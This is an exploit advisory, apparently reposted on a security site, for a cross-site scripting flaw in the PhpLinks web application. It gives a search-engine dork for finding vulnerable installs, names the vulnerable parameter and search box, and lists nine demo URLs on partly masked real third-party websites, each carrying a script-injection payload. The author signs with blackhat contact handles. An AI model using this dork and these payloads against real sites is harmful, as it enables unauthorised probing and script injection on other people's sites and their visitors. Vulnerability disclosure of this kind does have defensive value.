PhpLinks Cross Site Scripting Vulnerability

2013.09.15
Credit: Arsan
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # Exploit Title: PhpLinks Cross Site Scripting Vulnerability # Date: 2013 15 September # Author: Arsan # Vendor Homepage: www.newphplinks.com # Version : All Version # Tested on: Linux & Windows # Category: webapps # Google Keywords: inurl:"/index.php?PID=" intext:"Powered By phpLinks" # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Exploit : # # http://<server>/index.php?PID=[XSS] # http://<server>/[XSS In SearchBox] # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Demo : # # www.nXuth.com/index.php?PID=5"><script>alert(/Arsan/)</script> # www.eXeli.at/phplinks/index.php?PID=5"><script>alert(/Arsan/)</script> # www.ingegnXambientali.it/cercambiente/index.php?PID=5"><script>alert(/Arsan/)</script> # www.tourisXfo.it/index.php?PID=205"><script>alert(/Arsan/)</script> # www.lupuXnce-timbres.net/index.php?PID=10"><script>alert(/Arsan/)</script> # www.links.sXlbard.com/index.php?PID=3"><script>alert(/Arsan/)</script> # www.X.com/links/index.php?PID=6"><script>alert(/Arsan/)</script> # www.dietrX.kracht.free.fr/phplinks/index.php?PID=4"><script>alert(/Arsan/)</script> # www.myXcom.tw/avlinks/index.php?PID=5"><script>alert(/Arsan/)</script> # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Contact Me : # # Arsan.Blackhat@gmail.com # Twitter.com/ArsanBlackhat # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # I L0ve Inj3ct0r Team #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top